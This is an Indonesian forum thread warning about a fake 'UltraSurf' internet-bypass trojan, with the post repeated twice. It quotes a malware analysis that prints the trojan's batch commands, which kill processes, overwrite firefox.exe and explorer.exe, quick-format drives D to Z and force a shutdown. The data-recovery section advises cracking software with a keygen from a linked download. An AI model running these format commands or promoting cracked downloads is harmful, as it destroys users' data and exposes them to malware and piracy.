- Beranda
- Internet Service & Networking
Cara Mengatasi virus gentongan 3 AON (.iloveyoumindhack)
...
![TakagiFujimaru](https://s.kaskus.id/user/avatar/default.png)
![Avatar border](https://s.kaskus.id/images/avatarborder/1.gif)
TS
TakagiFujimaru
Cara Mengatasi virus gentongan 3 AON (.iloveyoumindhack)
maap agan semua, buat agan yang data na hilang, silahkan agan ke warnet dulu ato beli vocher three, turs agan donlot Wondershare Data Recovery Full di googlin aja ga, trus habis install, kan nongol tuh jendela wizardna, piih jenis data yaang dikembalikan, pilih ja yang pling bawah, trus pilih directory na, trus checklist enable deep scan, emang agak lama, n work data agan akan kembali excellent
regard
melanjutka thread ini saya akan membahas cara menghentikan virus ini
Assalamu Alaikum
Apa ada yang pernah kena Virus ini
Ini sangat Kesal Karena Telah meresahkan pengguna internet, ia bermoduskan bypass internet Gratis AON. Tapi apa di dalam salah satu program mengandung Virus Ultrasurf yang sangat berbahaya.
Kenapa saya bilang virus ini Sangat berbahaya karena :
1. virus ini bisa memformat Hardisk Semua Kecual C:
2. Virus ini membuat semua program yang di install gak bisa kebuka dan jadi Shorcut![Frown emoticon-Frown](https://s.kaskus.id/images/smilies/sumbangan/06.gif)
Menurut Virus Indonesia ini Penjelasan tentang Virus ini.
Ane kutip aja langsung dari Thread ini :
http://www.kaskus.co.id/showthread.php?t=16549849
Ini dia :
Sumber : http://virusindonesia.com/2011/08/16...mua-hard-disk/
Ultrasurf : memformat semua hard disk
![](https://dl.kaskus.id/virusindonesia.com/wp-content/uploads/2011/07/ultrasurf/1.msg.png)
UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan user alami jika menggunakan aplikasi tipuan ini karena sudah dipastikan user akan kehilangan seluruh data di hard disknya.
A. Info File
Nama Worm : UltraSurf
Asal : Indonesia
Ukuran File : Random
Packer : UPX 0.89 3.xx -> Markus & Laszlo ver. [ 3.07 ]
Pemrograman : Delphi
Icon : Random
Tipe : Trojan, Worm
B. About Malware
![](https://dl.kaskus.id/virusindonesia.com/wp-content/uploads/2011/07/ultrasurf/2.variant.png)
Variant pertama dari UltraSurf kami dapatkan berasala dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.
Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.
![](https://dl.kaskus.id/virusindonesia.com/wp-content/uploads/2011/07/ultrasurf/3.hexa.PNG)
C. Companion/File yang dibuat
![](https://dl.kaskus.id/virusindonesia.com/wp-content/uploads/2011/07/ultrasurf/4.batfile.PNG)
Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama alaskan ip.bat. Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.
D. Hasil Infeksi
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe
taskkill /f /im idman.exe
taskkill /f /im firefox.exe
taskkill /f /im explorer.exe
mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Internet Download Manager\IDMan.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Mozilla Firefox\firefox.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer.exe"
Memformat semua hard disk mulai dari drive D sampai Z.
echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
Format G: /Q /X /y
echo.
Format H: /Q /X /y
echo.
Format I: /Q /X /y
echo.
Format J: /Q /X /y
echo.
Format K: /Q /X /y
echo.
Format L: /Q /X /y
echo.
Format M: /Q /X /y
echo.
Format N: /Q /X /y
echo.
Format 0: /Q /X /y
echo.
Format P: /Q /X /y
echo.
Format Q: /Q /X /y
echo.
Format R: /Q /X /y
echo.
Format S: /Q /X /y
echo.
Format T: /Q /X /y
echo.
Format U: /Q /X /y
echo.
Format V: /Q /X /y
echo.
Format W: /Q /X /y
echo.
Format X: /Q /X /y
echo.
Format Y: /Q /X /y
echo.
Format Z: /Q /X /y
Dan yang terakhir adalah melakukan proses shuting down
start shutdown.exe -f -t 0 s
Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.
E. Pembersihan
![](https://dl.kaskus.id/virusindonesia.com/wp-content/uploads/2011/07/ultrasurf/5.pcmav.PNG)
PCMAV 5.4 Update Build1
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build1 telah hadir dengan penambahan 29 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com (sorry gan link nya mati
)
ZippyShare.com (mirror) (sorry gan link nya mati
)
rapid*share.com (mirror) (sorry gan link nya mati
)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Daftar tambahan virus hingga PCMAV 5.4 Update Build1:
Fandi.vbs.C
Fandi.vbs.C.inf
NgrBot
NgrBot.bat
NgrBot.dat
NgrBot.drp.A
NgrBot.drp.B
NgrBot.exe.A
NgrBot.exe.B
NgrBot.inf
NgrBot.lnk
Pluto.C
Pluto.C.drp
Pluto.C.htm
Redlof.vbs.B
Redlof.vbs.B.drp
Redlof.vbs.B.inf
RezaTera.B
RezaTera.B.drp
RezaTera.B.url
Rieysha-Jogja.E
Rieysha-Jogja.E.hosts
Rieysha-Jogja.E.vbs
UltraSurf.A
UltraSurf.A.bat
UltraSurf.B
UltraSurf.C
UltraSurf.D
UltraSurf.D.bat
Untuk Mengatasi itu diatas udah ada Caranya.![Big Grin emoticon-Big Grin](https://s.kaskus.id/images/smilies/sumbangan/14.gif)
Tapi ane punya cara sendiri yang lebih ampuh dan mudah.
1. Download Smadav Antivirus di http://smadav.net
2. Scan Computermu dengan Mode Full Scan
3. Setelah Scan Selesai restart Computer mu.
Tapi setelah di restart data tetap hilang .
Ingat saat pertama terserang jangan taruh data anda di hardisk yang terformat. Karena jika ini terjadi kemungkinan data anda tidak akan bisa lag kembali![Blue Guy Cendol (S) emoticon-Blue Guy Cendol (S)](https://s.kaskus.id/images/smilies/s_sm_cendol.gif)
Kemudian Download Software untuk mengembalikan Data yang Hilang.
Software yang paling mudah dan hasilnya 90% data kembali adalah Wondershare Data Recovery Full <- Ini udah gw test. Hasilnya bgus bisa juga pakai Get Data Back. COba Search di Google![Big Grin emoticon-Big Grin](https://s.kaskus.id/images/smilies/sumbangan/14.gif)
Cara pakai software Wondershare Data Recovery Gampang
1. Download dulu Softwarenya
2. Install dan pake keygen supaya full Softwarenya
3. Buka klik next
4. Pilih All Files dan Klik Next
5. Di Spesific Location Pilih Drive yang ingin dikembalikan datanya
6. Centang Deep Scan dan next
7. Tunggu
8. Setalah muncul semua centang semua data, pilih lokasi drive yang ingin disimpan data yang hilang . Ingat jika anda menscan Drive E maka tempat yang anda pilih untuk mengembalikan data jagan drive E juga pilih drive yang lain seperti Drive C:klik recovery
9. Pekerjaan paling membosankan adalah menunggu
10. Setelah itu Selesai deh
Untuk referensi Software :
[url]http://www.media*fire..com/?lclx2nkd9vtgmqx[/url]
pssword : neodatarecover
Ntr pilih complete recovery..katax sih 90-99% recovery
dan
EASEUS Data Recovery Wizard Pro v5.5.1
Terima Kasih
![Big Grin emoticon-Big Grin](https://s.kaskus.id/images/smilies/sumbangan/14.gif)
Sebagai tanda terima kasih tolong
![Blue Guy Cendol (S) emoticon-Blue Guy Cendol (S)](https://s.kaskus.id/images/smilies/s_sm_cendol.gif)
regards
Info menarik lainnya di :
http://skylandhacker.net
regard
melanjutka thread ini saya akan membahas cara menghentikan virus ini
Assalamu Alaikum
Apa ada yang pernah kena Virus ini
![](https://dl.kaskus.id/virusindonesia.com/wp-content/uploads/2011/07/ultrasurf/1.msg.png)
Ini sangat Kesal Karena Telah meresahkan pengguna internet, ia bermoduskan bypass internet Gratis AON. Tapi apa di dalam salah satu program mengandung Virus Ultrasurf yang sangat berbahaya.
Kenapa saya bilang virus ini Sangat berbahaya karena :
1. virus ini bisa memformat Hardisk Semua Kecual C:
2. Virus ini membuat semua program yang di install gak bisa kebuka dan jadi Shorcut
![Frown emoticon-Frown](https://s.kaskus.id/images/smilies/sumbangan/06.gif)
Menurut Virus Indonesia ini Penjelasan tentang Virus ini.
Ane kutip aja langsung dari Thread ini :
http://www.kaskus.co.id/showthread.php?t=16549849
Ini dia :
Sumber : http://virusindonesia.com/2011/08/16...mua-hard-disk/
Ultrasurf : memformat semua hard disk
![](https://dl.kaskus.id/virusindonesia.com/wp-content/uploads/2011/07/ultrasurf/1.msg.png)
UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan user alami jika menggunakan aplikasi tipuan ini karena sudah dipastikan user akan kehilangan seluruh data di hard disknya.
A. Info File
Nama Worm : UltraSurf
Asal : Indonesia
Ukuran File : Random
Packer : UPX 0.89 3.xx -> Markus & Laszlo ver. [ 3.07 ]
Pemrograman : Delphi
Icon : Random
Tipe : Trojan, Worm
B. About Malware
![](https://dl.kaskus.id/virusindonesia.com/wp-content/uploads/2011/07/ultrasurf/2.variant.png)
Variant pertama dari UltraSurf kami dapatkan berasala dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.
Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.
C. Companion/File yang dibuat
Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama alaskan ip.bat. Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.
D. Hasil Infeksi
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe
taskkill /f /im idman.exe
taskkill /f /im firefox.exe
taskkill /f /im explorer.exe
mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Internet Download Manager\IDMan.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Mozilla Firefox\firefox.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer.exe"
Memformat semua hard disk mulai dari drive D sampai Z.
echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
Format G: /Q /X /y
echo.
Format H: /Q /X /y
echo.
Format I: /Q /X /y
echo.
Format J: /Q /X /y
echo.
Format K: /Q /X /y
echo.
Format L: /Q /X /y
echo.
Format M: /Q /X /y
echo.
Format N: /Q /X /y
echo.
Format 0: /Q /X /y
echo.
Format P: /Q /X /y
echo.
Format Q: /Q /X /y
echo.
Format R: /Q /X /y
echo.
Format S: /Q /X /y
echo.
Format T: /Q /X /y
echo.
Format U: /Q /X /y
echo.
Format V: /Q /X /y
echo.
Format W: /Q /X /y
echo.
Format X: /Q /X /y
echo.
Format Y: /Q /X /y
echo.
Format Z: /Q /X /y
Dan yang terakhir adalah melakukan proses shuting down
start shutdown.exe -f -t 0 s
Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.
E. Pembersihan
PCMAV 5.4 Update Build1
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build1 telah hadir dengan penambahan 29 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com (sorry gan link nya mati
![Frown emoticon-Frown](https://s.kaskus.id/images/smilies/sumbangan/06.gif)
ZippyShare.com (mirror) (sorry gan link nya mati
![Frown emoticon-Frown](https://s.kaskus.id/images/smilies/sumbangan/06.gif)
rapid*share.com (mirror) (sorry gan link nya mati
![Frown emoticon-Frown](https://s.kaskus.id/images/smilies/sumbangan/06.gif)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Daftar tambahan virus hingga PCMAV 5.4 Update Build1:
Fandi.vbs.C
Fandi.vbs.C.inf
NgrBot
NgrBot.bat
NgrBot.dat
NgrBot.drp.A
NgrBot.drp.B
NgrBot.exe.A
NgrBot.exe.B
NgrBot.inf
NgrBot.lnk
Pluto.C
Pluto.C.drp
Pluto.C.htm
Redlof.vbs.B
Redlof.vbs.B.drp
Redlof.vbs.B.inf
RezaTera.B
RezaTera.B.drp
RezaTera.B.url
Rieysha-Jogja.E
Rieysha-Jogja.E.hosts
Rieysha-Jogja.E.vbs
UltraSurf.A
UltraSurf.A.bat
UltraSurf.B
UltraSurf.C
UltraSurf.D
UltraSurf.D.bat
Untuk Mengatasi itu diatas udah ada Caranya.
![Big Grin emoticon-Big Grin](https://s.kaskus.id/images/smilies/sumbangan/14.gif)
Tapi ane punya cara sendiri yang lebih ampuh dan mudah.
1. Download Smadav Antivirus di http://smadav.net
2. Scan Computermu dengan Mode Full Scan
3. Setelah Scan Selesai restart Computer mu.
Tapi setelah di restart data tetap hilang .
Ingat saat pertama terserang jangan taruh data anda di hardisk yang terformat. Karena jika ini terjadi kemungkinan data anda tidak akan bisa lag kembali
![Blue Guy Cendol (S) emoticon-Blue Guy Cendol (S)](https://s.kaskus.id/images/smilies/s_sm_cendol.gif)
Kemudian Download Software untuk mengembalikan Data yang Hilang.
Software yang paling mudah dan hasilnya 90% data kembali adalah Wondershare Data Recovery Full <- Ini udah gw test. Hasilnya bgus bisa juga pakai Get Data Back. COba Search di Google
![Big Grin emoticon-Big Grin](https://s.kaskus.id/images/smilies/sumbangan/14.gif)
Cara pakai software Wondershare Data Recovery Gampang
1. Download dulu Softwarenya
2. Install dan pake keygen supaya full Softwarenya
3. Buka klik next
4. Pilih All Files dan Klik Next
5. Di Spesific Location Pilih Drive yang ingin dikembalikan datanya
6. Centang Deep Scan dan next
7. Tunggu
8. Setalah muncul semua centang semua data, pilih lokasi drive yang ingin disimpan data yang hilang . Ingat jika anda menscan Drive E maka tempat yang anda pilih untuk mengembalikan data jagan drive E juga pilih drive yang lain seperti Drive C:klik recovery
9. Pekerjaan paling membosankan adalah menunggu
10. Setelah itu Selesai deh
Untuk referensi Software :
[url]http://www.media*fire..com/?lclx2nkd9vtgmqx[/url]
pssword : neodatarecover
Ntr pilih complete recovery..katax sih 90-99% recovery
dan
EASEUS Data Recovery Wizard Pro v5.5.1
Terima Kasih
![Big Grin emoticon-Big Grin](https://s.kaskus.id/images/smilies/sumbangan/14.gif)
![Big Grin emoticon-Big Grin](https://s.kaskus.id/images/smilies/sumbangan/14.gif)
Sebagai tanda terima kasih tolong
![Blue Guy Cendol (S) emoticon-Blue Guy Cendol (S)](https://s.kaskus.id/images/smilies/s_sm_cendol.gif)
![Blue Guy Cendol (S) emoticon-Blue Guy Cendol (S)](https://s.kaskus.id/images/smilies/s_sm_cendol.gif)
![Blue Guy Cendol (S) emoticon-Blue Guy Cendol (S)](https://s.kaskus.id/images/smilies/s_sm_cendol.gif)
![Blue Guy Cendol (S) emoticon-Blue Guy Cendol (S)](https://s.kaskus.id/images/smilies/s_sm_cendol.gif)
regards
Info menarik lainnya di :
http://skylandhacker.net
0
8.9K
48
![Guest](https://s.kaskus.id/user/avatar/default.png)
![Avatar border](https://s.kaskus.id/images/avatarborder/1.gif)
Tulis komentar menarik atau mention replykgpt untuk ngobrol seru
Mari bergabung, dapatkan informasi dan teman baru!
![Internet Service & Networking](https://s.kaskus.id/r200x200/ficon/image-183.png)
Internet Service & Networking![KASKUS Official KASKUS Official](https://s.kaskus.id/kaskus-next/next-assets/images/icon-official-badge.svg)
21.3KThread•4KAnggota
Urutkan
Terlama
![Guest](https://s.kaskus.id/user/avatar/default.png)
![Avatar border](https://s.kaskus.id/images/avatarborder/1.gif)
Tulis komentar menarik atau mention replykgpt untuk ngobrol seru